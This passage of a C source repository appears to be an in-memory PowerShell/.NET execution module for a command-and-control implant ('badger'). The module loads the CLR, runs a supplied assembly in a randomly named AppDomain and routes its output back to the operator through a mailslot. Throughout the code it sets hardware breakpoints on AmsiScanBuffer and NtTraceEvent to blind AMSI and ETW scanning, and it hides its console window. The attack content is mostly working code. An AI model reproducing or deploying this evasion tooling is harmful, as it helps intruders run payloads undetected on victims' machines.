disable hardware breakpoinnt */ 344 | HwBpEngineSetBp( BpEntry->Tid, BpEntry->Address, BpEntry->Position, FALSE ); 345 | 346 | /* zero out struct */ 347 | BadgerMemset( BpEntry,0, sizeof( BP_LIST ) ); 348 | 349 | /* free memory struct */ 350 | MSVCRT$free( BpEntry ); 351 | 352 | BpEntry = BpNext; 353 | } while ( TRUE ); 354 | 355 | /* free global state */ 356 | // if ( HwBpEngine == Instance.HwBpEngine ) { 357 | // NtHeapFree( HwBpEngine ); 358 | // 359 | // Instance.HwBpEngine = NULL; 360 | // } 361 | 362 | MSVCRT$free(gEngine); 363 | 364 | gEngine = NULL; 365 | // KERNEL32$ReleaseMutex(ghMutex); 366 | return STATUS_SUCCESS; 367 | } 368 | // 369 | ///*! 370 | // * Global exception handler 371 | // * @param Exception 372 | // * @return 373 | // */ 374 | LONG ExceptionHandler( 375 | IN OUT PEXCEPTION_POINTERS Exception 376 | ) { 377 | PBP_LIST BpEntry = NULL; 378 | BOOL Found = FALSE; 379 | #ifdef DEBUG 380 | BadgerDispatch(gdispatch, "Exception Address: %p\n", Exception->ExceptionRecord->ExceptionAddress ); 381 | BadgerDispatch(gdispatch, "Exception Code : %p\n", Exception->ExceptionRecord->ExceptionCode ); 382 | #endif 383 | //KERNEL32$WaitForSingleObject (ghMutex, INFINITE); 384 | if ( Exception->ExceptionRecord->ExceptionCode == STATUS_SINGLE_STEP && gEngine != NULL) 385 | { 386 | BpEntry = gEngine->Breakpoints; 387 | /* search in linked list for bp entry */ 388 | do { 389 | /* stop search */ 390 | if ( ! BpEntry ) { 391 | break; 392 | } 393 | 394 | /* check if it's the address we want */ 395 | if ( BpEntry->Address == Exception->ExceptionRecord->ExceptionAddress ) { 396 | Found = TRUE; 397 | 398 | /* remove breakpoint */ 399 | HwBpEngineSetBp( BpEntry->Tid, BpEntry->Address, BpEntry->Position, FALSE ); 400 | 401 | /* execute registered exception */ 402 | ( ( VOID (*)( PEXCEPTION_POINTERS ) ) BpEntry->Function ) ( Exception ); 403 | 404 | break; 405 | } 406 | 407 | /* Next entry */ 408 | BpEntry = BpEntry->Next; 409 | } while ( TRUE ); 410 | #ifdef DEBUG 411 | BadgerDispatch(gdispatch, "Found exception handler: %s\n", Found ? "TRUE" : "FALSE" ); 412 | #endif 413 | if ( Found ) { 414 | // KERNEL32$ReleaseMutex(ghMutex); 415 | return EXCEPTION_CONTINUE_EXECUTION; 416 | } 417 | } 418 | // KERNEL32$ReleaseMutex(ghMutex); 419 | return EXCEPTION_CONTINUE_SEARCH; 420 | } 421 | // 422 | //////END HWBPENGINE 423 | ///*Make MailSlot*/ 424 | BOOL WINAPI MakeSlot(LPCSTR lpszSlotName, HANDLE* mailHandle) 425 | { 426 | *mailHandle = KERNEL32$CreateMailslotA(lpszSlotName, 427 | 0, //No maximum message size 428 | MAILSLOT_WAIT_FOREVER, //No time-out for operations 429 | (LPSECURITY_ATTRIBUTES)NULL); //Default security 430 | 431 | if (*mailHandle == INVALID_HANDLE_VALUE) 432 | { 433 | return FALSE; 434 | } 435 | else 436 | return TRUE; 437 | } 438 | 439 | ///*Read Mailslot*/ 440 | BOOL ReadSlot(char* output, HANDLE* mailHandle) 441 | { 442 | DWORD cbMessage = 0; 443 | DWORD cMessage = 0; 444 | DWORD cbRead = 0; 445 | BOOL fResult; 446 | LPSTR lpszBuffer = NULL; 447 | size_t size = 65535; 448 | char* achID = (char*)MSVCRT$malloc(size); 449 | MSVCRT$memset(achID, 0, size); 450 | DWORD cAllMessages = 0; 451 | HANDLE hEvent; 452 | OVERLAPPED ov; 453 | 454 | hEvent = KERNEL32$CreateEventA(NULL, FALSE, FALSE, NULL); 455 | if (NULL == hEvent) 456 | return FALSE; 457 | ov.Offset = 0; 458 | ov.OffsetHigh = 0; 459 | ov.hEvent = hEvent; 460 | 461 | fResult = KERNEL32$GetMailslotInfo(*mailHandle, //Mailslot handle 462 | (LPDWORD)NULL, //No maximum message size 463 | &cbMessage, //Size of next message 464 | &cMessage, //Number of messages 465 | (LPDWORD)NULL); //No read time-out 466 | 467 | 468 | if (!fResult) 469 | { 470 | BadgerDispatch(gdispatch,"[-] GetMailslotInfo failed with error = %d\n",KERNEL32$GetLastError()); 471 | BadgerDispatch(gdispatch,"[-] cbMessage = %d\n[-] cbMessage = %d\n",cbMessage,cMessage); 472 | MSVCRT$free(achID); 473 | return FALSE; 474 | } 475 | #ifdef DEBUG 476 | BadgerDispatch(gdispatch,"[*] cbMessage = %d\n[*] cMessage = %d\n",cbMessage,cMessage); 477 | #endif 478 | if (cbMessage == MAILSLOT_NO_MESSAGE) 479 | { 480 | MSVCRT$free(achID); 481 | return TRUE; 482 | } 483 | 484 | cAllMessages = cMessage; 485 | 486 | while (cMessage != 0) //Get all messages 487 | { 488 | //Allocate memory for the message. 489 | lpszBuffer = (LPSTR)KERNEL32$GlobalAlloc(GPTR, KERNEL32$lstrlenA((LPSTR)achID) * sizeof(CHAR) + cbMessage); 490 | if (NULL == lpszBuffer) { 491 | MSVCRT$free(achID); 492 | return FALSE; 493 | } 494 | lpszBuffer[0] = '\0'; 495 | 496 | fResult = KERNEL32$ReadFile(*mailHandle, 497 | lpszBuffer, 498 | cbMessage, 499 | &cbRead, 500 | &ov); 501 | 502 | if (!fResult) 503 | { 504 | KERNEL32$GlobalFree((HGLOBAL)lpszBuffer); 505 | MSVCRT$free(achID); 506 | return FALSE; 507 | } 508 | 509 | //Copy mailslot output to returnData buffer 510 | MSVCRT$_snprintf(output + BadgerStrlen(output), BadgerStrlen(lpszBuffer) + 1, "%s", lpszBuffer); 511 | 512 | fResult = KERNEL32$GetMailslotInfo(*mailHandle, //Mailslot handle 513 | (LPDWORD)NULL, //No maximum message size 514 | &cbMessage, //Size of next message 515 | &cMessage, //Number of messages 516 | (LPDWORD)NULL); //No read time-out 517 | 518 | if (!fResult) 519 | { 520 | MSVCRT$free(achID); 521 | return FALSE; 522 | } 523 | 524 | } 525 | 526 | cbMessage = 0; 527 | KERNEL32$GlobalFree((HGLOBAL)lpszBuffer); 528 | //_CloseHandle CloseHandle = (_CloseHandle) GetProcAddress(GetModuleHandleA("kernel32.dll"), "CloseHandle"); 529 | KERNEL32$CloseHandle(hEvent); 530 | return TRUE; 531 | } 532 | 533 | /*Determine if .NET assembly is v4 or v2*/ 534 | BOOL FindVersion(void * assembly, int length) { 535 | char* assembly_c; 536 | assembly_c = (char*)assembly; 537 | char v4[] = { 0x76,0x34,0x2E,0x30,0x2E,0x33,0x30,0x33,0x31,0x39 }; 538 | 539 | for (int i = 0; i < length; i++) 540 | { 541 | for (int j = 0; j < 10; j++) 542 | { 543 | if (v4[j] != assembly_c[i + j]) 544 | { 545 | break; 546 | } 547 | else 548 | { 549 | if (j == (9)) 550 | { 551 | return 1; 552 | } 553 | } 554 | } 555 | } 556 | 557 | return 0; 558 | } 559 | 560 | 561 | 562 | /*Start CLR*/ 563 | BOOL StartCLR(LPCWSTR dotNetVersion, ICLRMetaHost * *ppClrMetaHost, ICLRRuntimeInfo * *ppClrRuntimeInfo, ICorRuntimeHost * *ppICorRuntimeHost) { 564 | 565 | //Declare variables 566 | HRESULT hr = 0; 567 | 568 | //Get the CLRMetaHost that tells us about .NET on this machine 569 | hr = MSCOREE$CLRCreateInstance(&xCLSID_CLRMetaHost, &xIID_ICLRMetaHost, (LPVOID*)ppClrMetaHost); 570 | 571 | if (hr == S_OK) 572 | { 573 | //Get the runtime information for the particular version of .NET 574 | hr = (*ppClrMetaHost)->lpVtbl->GetRuntime(*ppClrMetaHost, dotNetVersion, &xIID_ICLRRuntimeInfo, (LPVOID*)ppClrRuntimeInfo); 575 | if (hr == S_OK) 576 | { 577 | /*Check if the specified runtime can be loaded into the process. This method will take into account other runtimes that may already be 578 | loaded into the process and set fLoadable to TRUE if this runtime can be loaded in an in-process side-by-side fashion.*/ 579 | BOOL fLoadable; 580 | hr = (*ppClrRuntimeInfo)->lpVtbl->IsLoadable(*ppClrRuntimeInfo, &fLoadable); 581 | if ((hr == S_OK) && fLoadable) 582 | { 583 | //Load the CLR into the current process and return a runtime interface pointer. -> CLR changed to ICor which is deprecated but works 584 | hr = (*ppClrRuntimeInfo)->lpVtbl->GetInterface(*ppClrRuntimeInfo, &xCLSID_CorRuntimeHost, &xIID_ICorRuntimeHost, (LPVOID*)ppICorRuntimeHost); 585 | if (hr == S_OK) 586 | { 587 | //Start it. This is okay to call even if the CLR is already running 588 | (*ppICorRuntimeHost)->lpVtbl->Start(*ppICorRuntimeHost); 589 | } 590 | else 591 | { 592 | //If CLR fails to load fail gracefully 593 | BadgerDispatch(gdispatch , "[-] Process refusing to get interface of %ls CLR version. Try running an assembly that requires a differnt CLR version.\n", dotNetVersion); 594 | return 0; 595 | } 596 | } 597 | else 598 | { 599 | //If CLR fails to load fail gracefully 600 | BadgerDispatch(gdispatch , "[-] Process refusing to load %ls CLR version. Try running an assembly that requires a differnt CLR version.\n", dotNetVersion); 601 | return 0; 602 | } 603 | } 604 | else 605 | { 606 | //If CLR fails to load fail gracefully 607 | BadgerDispatch(gdispatch , "[-] Process refusing to get runtime of %ls CLR version. Try running an assembly that requires a differnt CLR version.\n", dotNetVersion); 608 | return 0; 609 | } 610 | } 611 | else 612 | { 613 | //If CLR fails to load fail gracefully 614 | BadgerDispatch(gdispatch , "[-] Process refusing to create %ls CLR version. Try running an assembly that requires a differnt CLR version.\n", dotNetVersion); 615 | return 0; 616 | } 617 | 618 | //CLR loaded successfully 619 | return 1; 620 | } 621 | 622 | /*Check Console Exists*/ 623 | BOOL consoleExists(void) {//https://www.devever.net/~hl/win32con 624 | if(!KERNEL32$GetConsoleWindow()) 625 | return FALSE; 626 | return TRUE; 627 | } 628 | 629 | void fillRandomString(char *string, int length){ 630 | for(int i=0;i 2){ 701 | for(int i=2;iClientId.UniqueThread); 804 | #endif 805 | FARPROC nttraceevent = KERNEL32$GetProcAddress(KERNEL32$LoadLibraryA("ntdll.dll"),"NtTraceEvent"); 806 | #ifdef DEBUG 807 | BadgerDispatch(gdispatch,"[*] NtTraceEvent = 0x%p\n",nttraceevent); 808 | #endif 809 | HwBpEngineAdd(NULL,(DWORD)(teb->ClientId.UniqueThread),amsiscanbuffer,HwBpExAmsiScanBuffer,0); 810 | HwBpEngineAdd(NULL,(DWORD)(teb->ClientId.UniqueThread),nttraceevent,HwBpExNtTraceEvent,1); 811 | 812 | //Convert assemblyArguments to wide string wAssemblyArguments to pass to loaded .NET assmebly 813 | size_t convertedChars = 0; 814 | wideSize = MSVCRT$strlen(assemblyArguments) + 1; 815 | #ifdef DEBUG 816 | BadgerDispatch(gdispatch,"[*] wideSize = %d\n",wideSize); 817 | #endif 818 | wAssemblyArguments = (wchar_t*)MSVCRT$malloc(wideSize * sizeof(wchar_t)); 819 | MSVCRT$mbstowcs_s(&convertedChars, wAssemblyArguments, wideSize, assemblyArguments, _TRUNCATE); 820 | #ifdef DEBUG 821 | BadgerDispatch(gdispatch,"[*] ConvertedChars = %d\n",convertedChars); 822 | #endif 823 | //generate random appDomain string 824 | fillRandomString(appDomain,5); 825 | #ifdef DEBUG 826 | BadgerDispatch(gdispatch,"[*] appDomain = %s\n",appDomain); 827 | #endif 828 | //Convert appDomain to wide string wAppDomain to pass to CreateDomain 829 | size_t convertedChars2 = 0; 830 | wideSize2 = MSVCRT$strlen(appDomain) + 1; 831 | #ifdef DEBUG 832 | BadgerDispatch(gdispatch,"[*] wideSize2 = %d\n",wideSize2); 833 | #endif 834 | wAppDomain = (wchar_t*)MSVCRT$malloc(wideSize2 * sizeof(wchar_t)); 835 | MSVCRT$mbstowcs_s(&convertedChars2, wAppDomain, wideSize2, (char*)appDomain, _TRUNCATE); 836 | #ifdef DEBUG 837 | BadgerDispatch(gdispatch,"[*] ConvertedChars2 = %d\n",convertedChars2); 838 | #endif 839 | //Get an array of arguments so arugements can be passed to .NET assembly 840 | argumentsArray = SHELL32$CommandLineToArgvW(wAssemblyArguments, &argumentCount); 841 | #ifdef DEBUG 842 | BadgerDispatch(gdispatch,"[*] argumentCount = %d\n",argumentCount); 843 | #endif 844 | //Create an array of strings that will be used to hold our arguments -> needed for Main(String[] args) 845 | vtPsa.vt = (VT_ARRAY | VT_BSTR); 846 | vtPsa.parray = OLEAUT32$SafeArrayCreateVector(VT_BSTR, 0, argumentCount); 847 | 848 | for (long i = 0; i < argumentCount; i++) 849 | { 850 | //Insert the string from argumentsArray[i] into the safearray 851 | OLEAUT32$SafeArrayPutElement(vtPsa.parray, &i, OLEAUT32$SysAllocString(argumentsArray[i])); 852 | } 853 | 854 | //Start CLR 855 | success = StartCLR((LPCWSTR)wNetVersion, &pClrMetaHost, &pClrRuntimeInfo, &pICorRuntimeHost); 856 | 857 | //If starting CLR fails exit gracefully 858 | if (success != 1) { 859 | //MSVCRT$free(assemblyArguments); 860 | goto CLEANUP; 861 | } 862 | #ifdef DEBUG 863 | BadgerDispatch(gdispatch,"[*] CLR started successfully\n"); 864 | #endif 865 | //Create Mailslot 866 | success = MakeSlot(slotPath, &mainHandle); 867 | 868 | if(!success){ 869 | BadgerDispatch(gdispatch,"[-] issue with creating slot\n"); 870 | goto CLEANUP; 871 | } 872 | #ifdef DEBUG 873 | BadgerDispatch(gdispatch,"[*] mainHandle = 0x%p\n",mainHandle); 874 | #endif 875 | hFile = KERNEL32$CreateFileA(slotPath, GENERIC_WRITE, FILE_SHARE_READ, (LPSECURITY_ATTRIBUTES)NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, (HANDLE)NULL); 876 | if(hFile == INVALID_HANDLE_VALUE){ 877 | BadgerDispatch(gdispatch,"[-] CreateFile to slotpath failed with error = %d\n",KERNEL32$GetLastError()); 878 | goto CLEANUP; 879 | } 880 | #ifdef DEBUG 881 | BadgerDispatch(gdispatch,"[*] hFile = 0x%p\n",hFile); 882 | #endif 883 | //Attach or create console 884 | BOOL frConsole = 0; 885 | BOOL attConsole = 0; 886 | attConsole = consoleExists(); 887 | if (attConsole != 1) 888 | { 889 | frConsole = 1; 890 | 891 | //_AllocConsole AllocConsole = (_AllocConsole) GetProcAddress(GetModuleHandleA("kernel32.dll"), "AllocConsole"); 892 | //_GetConsoleWindow GetConsoleWindow = (_GetConsoleWindow) GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetConsoleWindow"); 893 | if(KERNEL32$AllocConsole()) 894 | #ifdef DEBUG 895 | BadgerDispatch(gdispatch,"[*] Created Console\n"); 896 | #endif 897 | //Hide Console Window 898 | //HINSTANCE hinst = LoadLibrary("user32.dll"); 899 | //_ShowWindow ShowWindow = (_ShowWindow)GetProcAddress(hinst, "ShowWindow"); 900 | wnd = KERNEL32$GetConsoleWindow(); 901 | #ifndef DEBUG 902 | if (wnd) 903 | USER32$ShowWindow(wnd, SW_HIDE); 904 | #endif 905 | } 906 | 907 | //Get current stdout handle so we can revert stdout after we finish 908 | //_GetStdHandle GetStdHandle = (_GetStdHandle) GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetStdHandle"); 909 | stdOutput = KERNEL32$GetStdHandle(((DWORD)-11)); 910 | stdError = KERNEL32$GetStdHandle(((DWORD)-12)); 911 | //Set stdout to our newly created named pipe or mail slot 912 | //_SetStdHandle SetStdHandle = (_SetStdHandle) GetProcAddress(GetModuleHandleA("kernel32.dll"), "SetStdHandle"); 913 | success = KERNEL32$SetStdHandle (((DWORD)-11), hFile); 914 | if(!success){ 915 | BadgerDispatch(gdispatch,"[-] failed to set stdout with error = 0x%d\n",KERNEL32$GetLastError()); 916 | goto CLEANUP; 917 | } 918 | success = KERNEL32$SetStdHandle (((DWORD)-12), hFile); 919 | if(!success){ 920 | BadgerDispatch(gdispatch,"[-] failed to set stderr with error = 0x%d\n",KERNEL32$GetLastError()); 921 | goto CLEANUP; 922 | } 923 | //Create our AppDomain 924 | hr = pICorRuntimeHost->lpVtbl->CreateDomain(pICorRuntimeHost, (LPCWSTR)wAppDomain, NULL, &pAppDomainThunk); 925 | if(hr == S_OK){ 926 | hr = pAppDomainThunk->lpVtbl->QueryInterface(pAppDomainThunk, &xIID_AppDomain, (VOID**)&pAppDomain); 927 | if(hr == S_OK){ 928 | #ifdef DEBUG 929 | BadgerDispatch(gdispatch,"[*] AppDomain created succesfully\n"); 930 | #endif 931 | } 932 | else{ 933 | BadgerDispatch(gdispatch,"[-] QueryInterface failed. hr = %d\n",hr); 934 | goto CLEANUP; 935 | } 936 | } 937 | else{ 938 | BadgerDispatch(gdispatch,"[-] CreateDomain failed. hr = %d\n",hr); 939 | goto CLEANUP; 940 | } 941 | 942 | //Prep SafeArray 943 | rgsabound[0].cElements = assemblyBytesLen; 944 | rgsabound[0].lLbound = 0; 945 | SAFEARRAY* pSafeArray = OLEAUT32$SafeArrayCreate(VT_UI1, 1, rgsabound); 946 | #ifdef DEBUG 947 | BadgerDispatch(gdispatch,"[*] pSafeArray = 0x%p\n", pSafeArray); 948 | #endif 949 | if(pSafeArray == NULL){ 950 | BadgerDispatch(gdispatch,"[-] SafeArrayCreate failed\n"); 951 | goto CLEANUP; 952 | } 953 | void* pvData = NULL; 954 | hr = OLEAUT32$SafeArrayAccessData(pSafeArray, &pvData); 955 | if(hr != S_OK || pvData == NULL){ 956 | BadgerDispatch(gdispatch,"[-] SafeArrayAccessData failed with error = 0x%d. PvData = 0x%p\n",KERNEL32$GetLastError(),pvData); 957 | goto CLEANUP; 958 | } 959 | #ifdef DEBUG 960 | BadgerDispatch(gdispatch,"[*] pvData = 0x%p\n",pvData); 961 | #endif 962 | //Copy our assembly bytes to pvData 963 | MSVCRT$memcpy(pvData, assemblyBytes, assemblyBytesLen); 964 | 965 | hr = OLEAUT32$SafeArrayUnaccessData(pSafeArray); 966 | if(hr != S_OK){ 967 | BadgerDispatch(gdispatch,"[-] SafeArrayUnaccessData failed with error = 0x%d\n",KERNEL32$GetLastError()); 968 | goto CLEANUP; 969 | } 970 | //Prep AppDomain and EntryPoint 971 | hr = pAppDomain->lpVtbl->Load_3(pAppDomain, pSafeArray, &pAssembly); 972 | if (hr != S_OK) { 973 | //If AppDomain fails to load fail gracefully 974 | BadgerDispatch(gdispatch , "[-] Process refusing to load AppDomain of %ls CLR version. Try running an assembly that requires a differnt CLR version.\n", wNetVersion); 975 | //MSVCRT$free(assemblyArguments); 976 | goto CLEANUP; 977 | } 978 | #ifdef DEBUG 979 | BadgerDispatch(gdispatch,"[*] Assembly loaded successfully\n"); 980 | #endif 981 | hr = pAssembly->lpVtbl->EntryPoint(pAssembly, &pMethodInfo); 982 | if (hr != S_OK) { 983 | //If EntryPoint fails to load fail gracefully 984 | BadgerDispatch(gdispatch , "[-] Process refusing to find entry point of assembly.\n"); 985 | //MSVCRT$free(assemblyArguments); 986 | goto CLEANUP; 987 | } 988 | #ifdef DEBUG 989 | BadgerDispatch(gdispatch,"[*] Assembly entrypoint retrived. pMethodInfo = 0x%p\n",pMethodInfo); 990 | #endif 991 | MSVCRT$memset(&retVal, 0x0,sizeof(VARIANT)); 992 | MSVCRT$memset(&obj, 0x0,sizeof(VARIANT)); 993 | obj.vt = VT_NULL; 994 | 995 | //Change cElement to the number of Main arguments 996 | SAFEARRAY* psaStaticMethodArgs = OLEAUT32$SafeArrayCreateVector(VT_VARIANT, 0, (ULONG)entryPoint);//Last field -> entryPoint == 1 is needed if Main(String[] args) 0 if Main() 997 | 998 | //Insert an array of BSTR into the VT_VARIANT psaStaticMethodArgs array 999 | long idx[1] = { 0 }; 1000 | OLEAUT32$SafeArrayPutElement(psaStaticMethodArgs, idx, &vtPsa); 1001 | 1002 | //Invoke our .NET Method 1003 | hr = pMethodInfo->lpVtbl->Invoke_3(pMethodInfo, obj, psaStaticMethodArgs, &retVal); 1004 | if(hr != S_OK){ 1005 | BadgerDispatch(gdispatch,"[-] Invoke_3 failed with error %d\n",hr); 1006 | goto CLEANUP; 1007 | } 1008 | #ifdef DEBUG 1009 | BadgerDispatch(gdispatch,"[*] Invoke_3 returned successfully\n"); 1010 | #endif 1011 | //Read from our mailslot 1012 | success = ReadSlot(returnData, &mainHandle); 1013 | //Send .NET assembly output back to CS 1014 | if(success) 1015 | BadgerDispatch(gdispatch, "\n%s\n", returnData); 1016 | //Close handles 1017 | //_CloseHandle CloseHandle = (_CloseHandle) GetProcAddress(GetModuleHandleA("kernel32.dll"), "CloseHandle"); 1018 | CLEANUP: 1019 | //Revert stdout back to original handles 1020 | success = KERNEL32$SetStdHandle(((DWORD)-11), stdOutput); 1021 | success = KERNEL32$SetStdHandle(((DWORD)-12), stdError); 1022 | 1023 | if(hFile != INVALID_HANDLE_VALUE && hFile != NULL ){ 1024 | KERNEL32$CloseHandle(hFile); 1025 | hFile = INVALID_HANDLE_VALUE; 1026 | } 1027 | if(mainHandle != INVALID_HANDLE_VALUE && mainHandle != NULL) { 1028 | KERNEL32$CloseHandle(mainHandle); 1029 | mainHandle = INVALID_HANDLE_VALUE; 1030 | } 1031 | //Clean up 1032 | OLEAUT32$SafeArrayDestroy(pSafeArray); 1033 | OLEAUT32$VariantClear(&retVal); 1034 | OLEAUT32$VariantClear(&obj); 1035 | OLEAUT32$VariantClear(&vtPsa); 1036 | 1037 | if (NULL != psaStaticMethodArgs) { 1038 | OLEAUT32$SafeArrayDestroy(psaStaticMethodArgs); 1039 | psaStaticMethodArgs = NULL; 1040 | } 1041 | if (pMethodInfo != NULL) { 1042 | 1043 | pMethodInfo->lpVtbl->Release(pMethodInfo); 1044 | pMethodInfo = NULL; 1045 | } 1046 | if (pAssembly != NULL) { 1047 | 1048 | pAssembly->lpVtbl->Release(pAssembly); 1049 | pAssembly = NULL; 1050 | } 1051 | if (pAppDomain != NULL) { 1052 | 1053 | pAppDomain->lpVtbl->Release(pAppDomain); 1054 | pAppDomain = NULL; 1055 | } 1056 | if (pAppDomainThunk != NULL) { 1057 | 1058 | pAppDomainThunk->lpVtbl->Release(pAppDomainThunk); 1059 | } 1060 | if (pICorRuntimeHost != NULL) 1061 | { 1062 | (pICorRuntimeHost)->lpVtbl->UnloadDomain(pICorRuntimeHost, pAppDomainThunk); 1063 | (pICorRuntimeHost) = NULL; 1064 | } 1065 | if (pClrRuntimeInfo != NULL) 1066 | { 1067 | (pClrRuntimeInfo)->lpVtbl->Release(pClrRuntimeInfo); 1068 | (pClrRuntimeInfo) = NULL; 1069 | } 1070 | if (pClrMetaHost != NULL) 1071 | { 1072 | (pClrMetaHost)->lpVtbl->Release(pClrMetaHost); 1073 | (pClrMetaHost) = NULL; 1074 | } 1075 | if(assemblyArguments != NULL){ 1076 | MSVCRT$free(assemblyArguments); 1077 | assemblyArguments = NULL; 1078 | } 1079 | if(toEncode != NULL){ 1080 | MSVCRT$free(toEncode); 1081 | toEncode = NULL; 1082 | } 1083 | if(slotPath != NULL){ 1084 | MSVCRT$free(slotPath); 1085 | slotPath = NULL; 1086 | } 1087 | if(returnData != NULL){ 1088 | MSVCRT$free(returnData); 1089 | returnData = NULL; 1090 | } 1091 | if(ps_script_b64 != NULL){ 1092 | MSVCRT$free(ps_script_b64); 1093 | ps_script_b64 = NULL; 1094 | } 1095 | //HwBpEngineDestroy(NULL); 1096 | if(ghMutex!= INVALID_HANDLE_VALUE) 1097 | KERNEL32$CloseHandle(ghMutex); 1098 | //Free console only if we attached one 1099 | if (frConsole != 0) { 1100 | //_FreeConsole FreeConsole = (_FreeConsole) GetProcAddress(GetModuleHandleA("kernel32.dll"), "FreeConsole"); 1101 | success = KERNEL32$FreeConsole(); 1102 | } 1103 | 1104 | BadgerDispatch(gdispatch, "[+] psinline Finished\n"); 1105 | 1106 | } -------------------------------------------------------------------------------- /psinline.h: -------------------------------------------------------------------------------- 1 | // 2 | // Created by kali on 20/09/23. 3 | // 4 | 5 | #ifndef PSINLINE_PSINLINE_H 6 | #define PSINLINE_PSINLINE_H 7 | 8 | #include "Clr.h" 9 | 10 | 11 | #endif //PSINLINE_PSINLINE_H 12 | -------------------------------------------------------------------------------- /utils.h: -------------------------------------------------------------------------------- 1 | // 2 | // Created by kali on 19/09/23. 3 | // 4 | 5 | #ifndef PSINLINE_UTILS_H 6 | #define PSINLINE_UTILS_H 7 | 8 | #define U_PTR( x ) ( ( UINT_PTR ) x ) 9 | #define NT_SUCCESS(Status) ( ( ( NTSTATUS ) ( Status ) ) >= 0 ) 10 | 11 | #endif //PSINLINE_UTILS_H 12 | --------------------------------------------------------------------------------